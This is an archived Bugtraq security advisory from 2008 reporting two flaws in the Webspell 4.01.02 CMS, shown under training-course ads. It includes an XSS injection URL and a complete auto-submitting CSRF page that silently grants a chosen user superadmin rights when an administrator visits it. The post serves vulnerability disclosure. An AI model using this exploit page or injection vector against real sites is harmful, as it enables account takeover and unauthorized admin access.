Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

Webspell 4.01.02 2 Vulnerabilites

Subject: Webspell 4.01.02 2 Vulnerabilites
Date: Wed, 30 Jan 2008 14:12:58 +0100
########################################################################################
Webspell 4.01.02         2 Vulnerabilites     Founded by NBBN      Vendor: 
http://cms.webspell.org
########################################################################################

1) Cross-Site Scripting Vulnerability
2) Change User Permission XSRF Vulnerability




1)

http://site.tld/path/index.php?site=whoisonline&sort=";>[xss code]










2)

This creates a superadmin account, when an admin click a link, to a site with 
the following code:

<html>
<head>
<title>Superadmin Creator</title>
</head>
<body onLoad=javascript:document.formular.submit()>

<form name="formular" 
action="http://site.tld/webspell/admin/admincenter.php?site=members"; 
method="POST">
<input type="hidden" name="superadmin" value="1">
<input type="hidden" name="id" value="3"> <!-- userid -->
<input type="hidden" name="saveedit" value="update+member">
</form>

</body>
</html>


<Prev in Thread] Current Thread [Next in Thread>
  • Webspell 4.01.02 2 Vulnerabilites, nbbn <=